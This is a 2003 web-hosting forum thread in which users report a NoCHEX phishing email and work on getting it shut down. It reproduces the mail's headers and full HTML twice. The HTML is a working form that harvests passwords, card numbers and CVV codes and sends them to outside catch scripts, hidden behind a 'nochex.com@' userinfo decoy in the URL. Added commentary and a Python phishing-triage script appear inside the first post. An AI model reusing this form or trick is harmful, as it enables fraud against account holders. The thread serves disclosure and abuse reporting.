Web Hosting Talk

View Full Version : New Email Scam


kcdworks
05-28-2003, 03:04 PM
I received the following message; items in red have been edited from the headers. Forwarded this to the host listed, to the bandwidth provider (Yipes) and to the host where the catch script is.

This is (for anyone that doesn't want to bother reading the HTML I'm pasting) a request for me to update my NoCHEX information. I am in Dallas, TX, and obviously have nothing to do with NoCHEX. This is similar to the eBay scams that have happened recently. The difference here is that the form is embedded in the email rather than asking you to visit a site to update it.

---------------------------------------------------------------

Return-path: <nobody@cerebellum.nationhosts.com>
Envelope-to: email@mydomain.org
Delivery-date: Wed, 28 May 2003 18:49:45 +0000
Received: from nationhosts.com ([66.227.104.219] helo=cerebellum.nationhosts.com)
by my.host.name with esmtp (TLSv1:DES-CBC3-SHA:168)
(Exim 3.36 #1)
id 19L5za-0001tk-00
for email@mydomain.org; Wed, 28 May 2003 18:49:42 +0000
Received: from nobody by cerebellum.nationhosts.com with local (Exim 3.36 #1)
id 19L5zq-0000QC-00
for email@mydomain.org; Wed, 28 May 2003 14:49:58 -0400
To: email@mydomain.org
Subject: Dear NOCHEX Customer
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
From: Accounts@NOCHEX.com
Reply-To: Security@NOCHEX.com
Message-Id: <E19L5zq-0000QC-00@cerebellum.nationhosts.com>
Date: Wed, 28 May 2003 14:49:58 -0400
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - cerebellum.nationhosts.com
X-AntiAbuse: Original Domain - mydomain.org
X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [99 99]
X-AntiAbuse: Sender Address Domain - cerebellum.nationhosts.com


<html>
<TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0>
<TBODY>
<TR>
<TD><img border=0 src=http://support.NOCHEX.com/web/gfx/homepagetop.gif width=631 height=79>
</TD></TR></TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=5 width=600 align=center border=0>
<TBODY>
<TR>
<TD class=pp_sortofbig align=middle>Dear NOCHEX Customer</TD></TR>
<TR>
<TD vAlign=top>
<P>&nbsp;</P>
<P>This e-mail is the notification of recent innovations taken by NOCHEX
to detect inactive customers and non-functioning mailboxes.</P>
<P>The inactive customers are subject to restriction and removal in the
next 3 months.</P>
<P>Please confirm your email address and and Credit Card info<B 8pt
font-size: bold; font-weight: normal; font-variant:> </B>number by logging
in to your NOCHEX account using the form below:</P></TD></TR>
<TR>
<TD align=middle>
<FORM action=http://nochex.com@server1.freehu.com/16/fusen/matt/catch.php
method=post><BR><BR>
<CENTER>
<TABLE border=0>
<TBODY>
<TR>
<TD><B style=FONT-WEIGHT: bold 8pt>Email Address:</B></TD>
<TD><INPUT maxLength=32 size=30 name=lgn></TD></TR>
<TR>
<TD><B style=FONT-WEIGHT: bold 8pt>Password:</B></TD>
<TD><INPUT type=password maxLength=32 size=30 name=psw></TD></TR>
<TR>
<TD><B 8pt font-size: bold; font-weight: normal; font-variant:>Full
Name :&nbsp;</B></TD>
<TD><INPUT maxLength=32 size=30 name=full_name></TD></TR>
<TR>
<TD><B 8pt font-size: bold; font-weight: normal; font-variant:>Card
Type:</B></TD>
<TD><SELECT name=card_type> <OPTION value=>&nbsp;</OPTION>
<OPTION value=V selected>Visa/Delta/Electron</OPTION> <OPTION
value=M>MasterCard/Eurocard</OPTION> <OPTION
value=D>Discover</OPTION> <OPTION value=A>American
Express</OPTION> <OPTION value=S>Switch</OPTION> <OPTION
value=O>Solo</OPTION></SELECT> </TD></TR>
<TR>
<TD><B 8pt font-size: bold; font-weight: normal;
font-variant:>Credit Card #:&nbsp;</B></TD>
<TD><INPUT maxLength=16 size=30 name=cc></TD>
<TR>
<TD><B 8pt font-size: bold; font-weight: normal;
font-variant:>Exp.Date(mm/yyyy) #:&nbsp;</B></TD>
<TD><INPUT maxLength=7 size=30 name=exp_date></TD></TR>
<TR>
<TD><B 8pt font-size: bold; font-weight: normal; font-variant:>Card
Verification <BR>Number:</B></TD>
<TD><INPUT maxLength=4 size=3 name=val><FONT color=red size=1>(3
digits, on back of card) </FONT></TD></TR></TBODY></TABLE>
<P><INPUT type=submit value=Confirm> </P></FORM>
<P><BR><SPAN class=pp_smalltext>This notification expires May 31,
2003</SPAN> </P></CENTER></TD></TR>
<TR>
<TD align=middle>
<table width=610 height=32 cellpadding=0 cellspacing=0>
<tr>
<td width=640 height=12 valign=top colspan=11><img src=http://support.nochex.com/web/gfx/homepagebottom.gif width=640 height=12 alt=NOCHEX Email Money. Homepage.></td>
</tr></table>
<BR><STRONG>Thanks for using NOCHEX! </STRONG><BR></TD></TR>
<TR>
<TD><IMG src=paypal_files/dot_row_long.gif width=590 height=5></TD></TR>
<TR>
<TD class=pp_footer><BR>Copyright© 2002 NOCHEX Inc. All rights reserved. Designated
trademarks and brands are the property of their respective owners.
</TD></TR></TBODY></TABLE>
</html>

-------------------------------------------------------------------

Just posted for the curious, or perhaps if there is someone from "nationhosts", FDCServers (where the IP address is) or Yipes that happens to visit these forums, hopefully they will shut this down.
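The security-relevant detail in the form above is the action URL, `http://nochex.com@server1.freehu.com/...`. Everything before the `@` in that URL is userinfo (a username), not a hostname: a browser of the time showed "nochex.com" at the start of the address while actually posting the form to server1.freehu.com (newer browsers strip or refuse such URLs, but the same trick still turns up in mail clients and URL previews). The second detail is in the headers: "Received: from nobody by cerebellum.nationhosts.com with local" is Exim's record of a message handed in by a local process, here the web server's `nobody` account, rather than received over SMTP. The following is an added example, not code from this thread or from any of the hosts named in it. It parses a constructed, trimmed copy of the message, splits the form action into the decoy userinfo and the real host, lists which fields it harvests, and flags the local-script origin. The flag names and the `SENSITIVE` field-name heuristic are assumptions of this example.

```python
"""Triage of an HTML phishing mail of the kind posted above: where the form
really posts to, what it harvests, and whether the mail was injected by a
local script on the relaying host. Added example, not code from the thread."""
import re
from email import message_from_string
from email.policy import default
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: a trimmed copy of the message in the thread (hostnames,
# field names and headers as posted; the HTML boilerplate is left out).
SAMPLE = (
    "Return-path: <nobody@cerebellum.nationhosts.com>\n"
    "Received: from nationhosts.com ([66.227.104.219] helo=cerebellum.nationhosts.com)\n"
    "    by my.host.name with esmtp (Exim 3.36 #1)\n"
    "    for email@mydomain.org; Wed, 28 May 2003 18:49:42 +0000\n"
    "Received: from nobody by cerebellum.nationhosts.com with local (Exim 3.36 #1)\n"
    "    id 19L5zq-0000QC-00\n"
    "    for email@mydomain.org; Wed, 28 May 2003 14:49:58 -0400\n"
    "To: email@mydomain.org\n"
    "Subject: Dear NOCHEX Customer\n"
    "MIME-Version: 1.0\n"
    "Content-type: text/html; charset=iso-8859-1\n"
    "From: Accounts@NOCHEX.com\n"
    "Reply-To: Security@NOCHEX.com\n"
    "\n"
    "<html><body>\n"
    "<FORM action=http://nochex.com@server1.freehu.com/16/fusen/matt/catch.php method=post>\n"
    "<INPUT maxLength=32 size=30 name=lgn>\n"
    "<INPUT type=password maxLength=32 size=30 name=psw>\n"
    "<INPUT maxLength=16 size=30 name=cc>\n"
    "<INPUT maxLength=4 size=3 name=val>\n"
    "<INPUT type=submit value=Confirm>\n"
    "</FORM></body></html>\n"
)

# "Received: from <user> by <host> with local" is how Exim records a message
# handed to it by a local process (here the web server's "nobody" account),
# as opposed to one received over SMTP.
LOCAL_ORIGIN = re.compile(r"from\s+(\S+)\s+by\s+(\S+)\s+with\s+local\b")

# Heuristic (assumption, tuned to the field names in this thread): input names
# that carry a password or card data.
SENSITIVE = re.compile(r"^(psw|cc|val|exp_date)$|pass|pwd|card|cvv|cvc", re.I)


class FormScanner(HTMLParser):
    """Collect each <form> action and the names of the inputs inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._open)
        elif tag in ("input", "select", "textarea") and self._open and a.get("name"):
            self._open["inputs"].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def triage(raw_message):
    """Return a dict of findings for one raw RFC 822 message."""
    msg = message_from_string(raw_message, policy=default)
    from_domain = msg["From"].addresses[0].domain.lower()
    scanner = FormScanner()
    scanner.feed(msg.get_content())

    report = {"from_domain": from_domain, "forms": [], "flags": []}
    for form in scanner.forms:
        parts = urlsplit(form["action"])
        # Anything before "@" in the authority is userinfo: displayed in the
        # URL, ignored when choosing the server. The host is what follows it.
        entry = {
            "action": form["action"],
            "decoy": parts.username,
            "real_host": (parts.hostname or "").lower(),
            "sensitive_fields": [n for n in form["inputs"] if SENSITIVE.search(n)],
        }
        report["forms"].append(entry)
        if entry["decoy"]:
            report["flags"].append("userinfo_in_action_url")
        host = entry["real_host"]
        if host and host != from_domain and not host.endswith("." + from_domain):
            report["flags"].append("action_host_differs_from_sender")
        if entry["sensitive_fields"]:
            report["flags"].append("password_or_card_collected_in_mail")

    for received in msg.get_all("Received", []):
        m = LOCAL_ORIGIN.search(str(received))
        if m:
            report["injected_by"] = (m.group(1), m.group(2))
            report["flags"].append("local_script_origin")
            break
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

Run against the sample, `triage` reports the decoy `nochex.com`, the real host `server1.freehu.com`, the harvested fields `psw`, `cc` and `val`, and the injecting account and host (`nobody`, `cerebellum.nationhosts.com`); the "Received ... with local" line is the one piece of evidence the host's admin can act on, since it points at a script running as the web server user rather than at an SMTP client.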

internext
05-28-2003, 03:40 PM
I just got two of these emails and sent an email to Nochex

Hope they shut this fraudster down before people lose their money.

Eric

kcdworks
05-28-2003, 03:44 PM
Funny, I tried sending this email to Nochex (I got two of them as well), and they don't have an abuse box or a fraud box .... had to resort to sending to support@nochex.com

Also just found this: http://www.server1.freehu.com/16/fusen/

microsol
05-28-2003, 03:58 PM
:eek: Total emails collected : 99061 :eek: I hope they will get them shutdown ASAP!

internext
05-28-2003, 04:08 PM
Abuse@nochex.com bounced back to me, but webmaster@nochex.com went through. I even sent a link to this thread in a follow-up email to them. Let's hope they jump on this.

I, Brian
05-28-2003, 04:25 PM
Sort of a depressed version of the...

[EDIT - sorry, will not list other scams in case they inspire others. :o ]

NationHosts
05-28-2003, 11:23 PM
Hi, I was e-mailed the following. I host a domain called aol-forum.com, but NOT nochex.com. I'm not sure how they got spam, but it looks like it's coming from aol-forum.com. I own nationhosts.com; their account is currently suspended, but here's the copy.

please deal with this spam problem immediately. If we don't get a response
from you in the next 6 hours your server will be disconnected

regards

FDCservers
----- Original Message -----
From: <270280998@reports.spamcop.net>
To: <abuse@fdcservers.net>
Sent: Wednesday, May 28, 2003 11:51 AM
Subject: [SpamCop (http://aol-forum.com/eimages/polls/catch.php)
id:270280998]Dear NOCHEX Customer


> - SpamCop V1.3.3 -
> This message is brief for your comfort. Please follow links for details.
>
> http://spamcop.net/w3m?i=z270280996z0ade984269d48f6f9dce3849e4d3d15ez
> Email from 66.227.104.219 / Wed, 28 May 2003 14:51:22 -0400
>
> http://spamcop.net/w3m?i=z270280998z21638ffa8183a328c1e56839a2fad5f8z
> Spamvertised website: http://aol-forum.com/eimages/polls/catch.php
> > http://aol-forum.com/eimages/polls/catch.php is 66.227.107.164; Wed, 28
May 2003 23:10:07 GMT
>
> Offending message:
> Return-path: <nobody@cerebellum.nationhosts.com>
> Envelope-to: x
> Delivery-date: Wed, 28 May 2003 14:51:22 -0400
> Received: from nationhosts.com ([66.227.104.219]
helo=cerebellum.nationhosts.com)
> by server1.***********.com with esmtp (TLSv1:DES-CBC3-SHA:168)
> (Exim 3.36 #1)
> id 19L61C-0003aH-00
> for x; Wed, 28 May 2003 14:51:22 -0400
> Received: from nobody by cerebellum.nationhosts.com with local (Exim 3.36
#1)
> id 19L61V-0001Ct-00
> for x; Wed, 28 May 2003 14:51:41 -0400
> To: x
> Subject: Dear NOCHEX Customer
> MIME-Version: 1.0
> Content-type: text/html; charset=iso-8859-1
> From: Accounts@NOCHEX.com
> Reply-To: Security@NOCHEX.com
> Message-Id: <E19L_________t-00@cerebellum.nationhosts.com>
> Date: Wed, 28 May 2003 14:51:41 -0400
> X-AntiAbuse: This header was added to track abuse, please include it with
any abuse report
> X-AntiAbuse: Primary Hostname - cerebellum.nationhosts.com
> X-AntiAbuse: Original Domain - b2phat.com
> X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [99 99]
> X-AntiAbuse: Sender Address Domain - cerebellum.nationhosts.com
>
>
> <html>
> <TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0>
> <TBODY>
> <TR>
> <TD><img border=0
src=http://support.NOCHEX.com/web/gfx/homepagetop.gif width=631 height=79>
> </TD></TR></TBODY></TABLE>
> <TABLE cellSpacing=0 cellPadding=5 width=600 align=center border=0>
> <TBODY>
> <TR>
> <TD class=pp_sortofbig align=middle>Dear NOCHEX Customer</TD></TR>
> <TR>
> <TD vAlign=top>
> <P>&nbsp;</P>
> <P>This e-mail is the notification of recent innovations taken by
NOCHEX
> to detect inactive customers and non-functioning mailboxes.</P>
> <P>The inactive customers are subject to restriction and removal in
the
> next 3 months.</P>
> <P>Please confirm your email address and and Credit Card info<B 8pt
> font-size: bold; font-weight: normal; font-variant:> </B>number by
logging
> in to your NOCHEX account using the form below:</P></TD></TR>
> <TR>
> <TD align=middle>
> <FORM action=http://nochex.com@aol-forum.com/eimages/polls/catch.php
> method=post><BR><BR>
> <CENTER>
> <TABLE border=0>
> <TBODY>
> <TR>
> <TD><B style=FONT-WEIGHT: bold 8pt>Email Address:</B></TD>
> <TD><INPUT maxLength=32 size=30 name=lgn></TD></TR>
> <TR>
> <TD><B style=FONT-WEIGHT: bold 8pt>Password:</B></TD>
> <TD><INPUT type=password maxLength=32 size=30
name=psw></TD></TR>
> <TR>
> <TD><B 8pt font-size: bold; font-weight: normal;
font-variant:>Full
> Name :&nbsp;</B></TD>
> <TD><INPUT maxLength=32 size=30 name=full_name></TD></TR>
> <TR>
> <TD><B 8pt font-size: bold; font-weight: normal;
font-variant:>Card
> Type:</B></TD>
> <TD><SELECT name=card_type> <OPTION value=>&nbsp;</OPTION>
> <OPTION value=V selected>Visa/Delta/Electron</OPTION>
<OPTION
> value=M>MasterCard/Eurocard</OPTION> <OPTION
> value=D>Discover</OPTION> <OPTION value=A>American
> Express</OPTION> <OPTION value=S>Switch</OPTION> <OPTION
> value=O>Solo</OPTION></SELECT> </TD></TR>
> <TR>
> <TD><B 8pt font-size: bold; font-weight: normal;
> font-variant:>Credit Card #:&nbsp;</B></TD>
> <TD><INPUT maxLength=16 size=30 name=cc></TD>
> <TR>
> <TD><B 8pt font-size: bold; font-weight: normal;
> font-variant:>Exp.Date(mm/yyyy) #:&nbsp;</B></TD>
> <TD><INPUT maxLength=7 size=30 name=exp_date></TD></TR>
> <TR>
> <TD><B 8pt font-size: bold; font-weight: normal;
font-variant:>Card
> Verification <BR>Number:</B></TD>
> <TD><INPUT maxLength=4 size=3 name=val><FONT color=red size=1>(3
> digits, on back of card) </FONT></TD></TR></TBODY></TABLE>
> <P><INPUT type=submit value=Confirm> </P></FORM>
> <P><BR><SPAN class=pp_smalltext>This notification expires May 31,
> 2003</SPAN> </P></CENTER></TD></TR>
> <TR>
> <TD align=middle>
> <table width=610 height=32 cellpadding=0 cellspacing=0>
> <tr>
> <td width=640 height=12 valign=top colspan=11><img
src=http://support.nochex.com/web/gfx/homepagebottom.gif width=640 height=12
alt=NOCHEX Email Money. Homepage.></td>
> </tr></table>
> <BR><STRONG>Thanks for using NOCHEX! </STRONG><BR></TD></TR>
> <TR>
> <TD><IMG src=paypal_files/dot_row_long.gif width=590
height=5></TD></TR>
> <TR>
> <TD class=pp_footer><BR>Copyright© 2002 NOCHEX Inc. All rights
reserved. Designated
> trademarks and brands are the property of their respective owners.
> </TD></TR></TBODY></TABLE>
> </html>
>
>
>
>

NationHosts
05-29-2003, 12:06 AM
Hi,
Our server admin at nationhosts is looking through the logs right now to see if anyone was using the sendmail command or SMTP, as well as the e-mail logs, to check if any large amounts of traffic were sent. I apologize for any problems this has caused you. Thanks.

If we find the logs we will post them and censor what we feel should not be released (such as IPs).

NationHosts
05-29-2003, 12:24 AM
This is what we found.

2003-05-28 15:51:12 19L6x6-00081Q-00 rejected from mailrelay.base.be [195.95.20.42]: temporarily unable to verify sender address ; Wed, 28 May 2003 21:51:18 +0200 (MET DST)
P Received: by mailhub.base.be from localhost
(router,slmail V5.1); Wed, 28 May 2003 21:50:48 +0200
for
P Received: by mailhub.base.be from localhost
(router,slmail V5.1); Wed, 28 May 2003 21:50:43 +0200
for
P Received: from cerebellum.nationhosts.com (nationhosts.com [66.227.104.219])
by mailrelay.base.be (Postfix) with ESMTP id 73ECA41BF2
for ; Wed, 28 May 2003 21:51:06 +0200 (MET DST)
P Received: from nobody by cerebellum.nationhosts.com with local (Exim 3.36 #1)
id 19L6wY-0007rx-00
for tony.doyle@base.be; Wed, 28 May 2003 15:50:38 -0400
F From:
T To:
R Reply-To:
Subject: DELIVERY FAILURE: User tony.doyle (tony.doyle@base.be) not listed in public
Name & Address Book
MIME-Version: 1.0
I Message-Id:
Date: Wed, 28 May 2003 15:50:38 -0400
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - cerebellum.nationhosts.com
X-AntiAbuse: Original Domain - base.be
X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [99 99]
X-AntiAbuse: Sender Address Domain - cerebellum.nationhosts.com
X-SLUIDL: 94F6A705-FEE34B5E-B09EB731-34203FFD
Content-Type: multipart/report; report-type=delivery-status; boundary="==IFJRGLKFGIR40697UHRUHIHD"

This user is unauthorized to access our servers. I found this odd; looks like some European cell phone company...

kcdworks
05-29-2003, 12:30 AM
Good to see quick action on this, Matt. :)

NationHosts
05-29-2003, 12:53 AM
Looks like my customer that got suspended didn't take the base.be thing too well and instead went and took it out. Ouch!

kcdworks
06-02-2003, 09:53 AM
Well, the hole was not plugged. I'm getting more scam mail today, still reading as cerebellum.nationhosts.com.

You probably should go ahead and disable that formmail script altogether.